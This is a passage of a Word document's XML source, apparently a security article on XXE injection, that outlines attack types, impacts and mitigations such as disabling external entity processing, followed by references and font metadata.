        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>Attackers can read sensitive files from the server, as shown in the previous examples.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7628501D">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>4.2 Denial of Service (DoS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DF1FAEE">
      <w:pPr>
        <w:pStyle w:val="8"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>By including large external entities, attackers can overwhelm the server, leading to crashes or resource exhaustion. This is often referred to as the "billion laughs" attack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10239FF4">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>4.3 Server-Side Request Forgery (SSRF)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EB41C01">
      <w:pPr>
        <w:pStyle w:val="8"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>XXE can enable attackers to make requests from the server to internal resources that are otherwise protected, potentially revealing internal architecture or sensitive data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77E9CB53">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>4.4 Remote Code Execution (RCE)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22E748E3">
      <w:pPr>
        <w:pStyle w:val="8"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>In some configurations, XXE can lead to remote code execution, allowing attackers to run arbitrary code on the server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DE08D85">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>5. Impact of XXE Attacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50DE4785">
      <w:pPr>
        <w:pStyle w:val="8"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>The impact of XXE vulnerabilities can be severe and may include:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DF2785C">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:suppressLineNumbers w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="1" w:after="0" w:afterAutospacing="1"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="9"/>
        </w:rPr>
        <w:t>Data Breach</w:t>
      </w:r>
      <w:r>
        <w:t>: Unauthorized access to sensitive data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33652E57">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:suppressLineNumbers w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="1" w:after="0" w:afterAutospacing="1"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="9"/>
        </w:rPr>
        <w:t>Application Downtime</w:t>
      </w:r>
      <w:r>
        <w:t>: Service disruptions due to DoS attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="153F435D">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:suppressLineNumbers w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="1" w:after="0" w:afterAutospacing="1"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="9"/>
        </w:rPr>
        <w:t>System Compromise</w:t>
      </w:r>
      <w:r>
        <w:t>: In severe cases, attackers may gain control over the server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21F48019">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:suppressLineNumbers w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="1" w:after="0" w:afterAutospacing="1"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="9"/>
        </w:rPr>
        <w:t>Legal Consequences</w:t>
      </w:r>
      <w:r>
        <w:t>: Organizations may face legal action or regulatory penalties due to data breaches.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7976E4FC">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>6. Mitigation Measures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52660AE8">
      <w:pPr>
        <w:pStyle w:val="8"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>To protect against XXE injection, the following measures can be implemented:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E2AFA77">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>6.1 Disable External Entity Processing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C01D821">
      <w:pPr>
        <w:pStyle w:val="8"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Configure XML parsers to disable external entity processing, which can be achieved through settings in popular libraries (e.g., setting </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="7"/>
        </w:rPr>
        <w:t>setFeature("http://xml.org/sax/features/external-general-entities", false)</w:t>
      </w:r>
      <w:r>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35D10BD1">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>6.2 Input Validation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FC39C99">
      <w:pPr>
        <w:pStyle w:val="8"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>Validate and sanitize XML input rigorously to ensure it adheres to expected formats.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2190B550">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>6.3 Use Safe Libraries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="158C63F6">
      <w:pPr>
        <w:pStyle w:val="8"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>Consider using XML processing libraries that are not vulnerable to XXE, or those that offer secure defaults.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E0793C5">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>6.4 Security Reviews and Testing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="400410C7">
      <w:pPr>
        <w:pStyle w:val="8"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>Conduct regular security assessments and penetration testing to identify potential XXE vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B28C105">
      <w:pPr>
        <w:pStyle w:val="8"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="100E76A6">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>6.5 Educate Developers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5077429F">
      <w:pPr>
        <w:pStyle w:val="8"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>Train developers on secure coding practices to recognize and mitigate risks associated with XML processing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A507FA5">
      <w:pPr>
        <w:pStyle w:val="8"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="55FAEF17">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>7. Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68F45C21">
      <w:pPr>
        <w:pStyle w:val="8"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>XXE injection is a serious security vulnerability that can have far-reaching impacts on an organization. Understanding how it works, the types of attacks it can facilitate, and the best practices for mitigation is essential for securing applications that handle XML data. By implementing proper security measures, organizations can significantly reduce the risk of XXE-related vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19746234">
      <w:pPr>
        <w:pStyle w:val="8"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1199CB27">
      <w:pPr>
        <w:pStyle w:val="8"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21D0A224">
      <w:pPr>
        <w:pStyle w:val="8"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F0F42F5">
      <w:pPr>
        <w:pStyle w:val="8"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03711A87">
      <w:pPr>
        <w:pStyle w:val="8"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="798B5540">
      <w:pPr>
        <w:pStyle w:val="8"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7374186D">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>8. References</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10B0D473">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:suppressLineNumbers w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="1" w:after="0" w:afterAutospacing="1"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t>OWASP. (2023). "XML External Entity (XXE) Processing." Retrieved from OWASP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="771F80B1">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:suppressLineNumbers w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="1" w:after="0" w:afterAutospacing="1"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t>M. Howard &amp; D. LeBlanc. (2003). "Writing Secure Code." Microsoft Press.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="049816D7">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:suppressLineNumbers w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="1" w:after="0" w:afterAutospacing="1"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t>R. D. Young. (2015). "Securing XML Applications." Retrieved from Black Hat.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E8498A6">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:suppressLineNumbers w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="1" w:after="0" w:afterAutospacing="1"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t>CWE. (2023). "CWE-20: Improper Input Validation." Retrieved from CWE.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A3982A7">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:suppressLineNumbers w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="1" w:after="0" w:afterAutospacing="1"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t>R. J. Smith. (2021). "Practical Security for Web Applications." Retrieved from Packt Publishing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16701146">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2AB82CC4"/>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Script">
    <w:panose1 w:val="030B0504020000000003"/>
    <w:charset w:val="00"/>
    <w:family w:val="auto"/>
    <w:pitch w:val="default"/>
    <w:sig w:usb0="0000028F"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Emoji">
    <w:panose1 w:val="020B0502040204020203"/>
    <w:charset w:val="00"/>
    <w:family w:val="auto"/>
    <w:pitch w:val="default"/>
    <w:sig w:usb0="00000001" w:usb1="02000000" w:usb2="00000000" w:usb3="00000000" w:csb0="00000001" w:csb1="00000000"/>
  </w:font>
  <w:font w:name="Segoe UI Light">
    <w:panose1 w:val="020B0502040204020203"/>
    <w:charset w:val="00"/>
    <w:family w:val="auto"/>
    <w:pitch w:val="default"/>
    <w:sig w:usb0="E4002EFF" w:usb1="C000E47F" w:usb2="00000009" w:usb3="00000000" w:csb0="200001FF" w:csb1="00000000"/>
  </w:font>
  <w:font w:name="Segoe UI Semibold">
    <w:panose1 w:val="020B0702040204020203"/>
    <w:charset w:val="00"/>
    <w:family w:val="auto"/>
    <w:pitch w:val="default"/>
    <w:sig w:usb0="E4002EFF" w:usb1="C000E47F" w:usb2="00000009" w:usb3="00000000" w:csb0="200001FF" w:csb1="00000000"/>
  </w:font>
  <w:font w:name="Segoe UI Semilight">
    <w:panose1 w:val="020B0402040204020203"/>
    <w:charset w:val="00"/>
    <w:family w:val="auto"/>
    <w:pitch w:val="default"/>
    <w:sig w:usb0="E4002EFF" w:usb1="C000E47F" w:usb2="00000009" w:usb3="00000000" w:csb0="200001FF" w:csb1="00000000"/>
  </w:font>
  <w:font w:name="Marlett">
    <w:panose1 w:val="00000000000000000000"/>
    <w:charset w:val="00"/>
    <w:family w:val="auto"/>
    <w:pitch w:val="default"/>
    <w:sig w:usb0="00000000" w:usb1="00000000" w:usb2="00000000" w:usb3="00000000" w:csb0="80000000" w:csb1="00000000"/>
  </w:font>
  <w:font w:name="Yu Gothic UI Semilight">
    <w:panose1 w:val="020B04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Palatino Linotype">
    <w:panose1 w:val="02040502050505030304"/>
    <w:charset w:val="00"/>
    <w:family w:val="auto"/>
    <w:pitch w:val="default"/>
    <w:sig w:usb0="E0000287" w:usb1="40000013" w:usb2="00000000" w:usb3="00000000" w:csb0="2000019F" w:csb1="00000000"/>
  </w:font>
  <w:font w:name="Nirmala UI Semilight">
    <w:panose1 w:val="020B0402040204020203"/>
    <w:charset w:val="00"/>
    <w:family w:val="auto"/>
    <w:pitch w:val="default"/>
    <w:sig w:usb0="80FF8023" w:usb1="0200004A" w:usb2="00000200" w:usb3="00040000" w:csb0="00000001" w:csb1="00000000"/>
  </w:font>
  <w:font w:name="Myanmar Text">
    <w:panose1 w:val="020B0502040204020203"/>
    <w:charset w:val="00"/>
    <w:family w:val="auto"/>
    <w:pitch w:val="default"/>
    <w:sig w:usb0="80000003" w:usb1="00000000" w:usb2="00000400" w:usb3="00000000" w:csb0="00000001" w:csb1="0000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0311F7"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D10311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5619D8"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D35619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E55E12E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="DE55E1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AACB2A8"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5AACB2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6D32C55"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="66D32C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975072"/>
    <w:rsid w:val="2A812531"/>
    <w:rsid w:val="4C97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21</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2024-10-07T07:04:00Z</dcterms:created>
  <dc:creator>Yahaiya</dc:creator>
  <cp:lastModifiedBy>Yahaiya</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-10-07T07:29:00Z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0B30F10FD8294BC8B552447BB4C0BB15_11</vt:lpwstr>
  </property>
</Properties>
</file>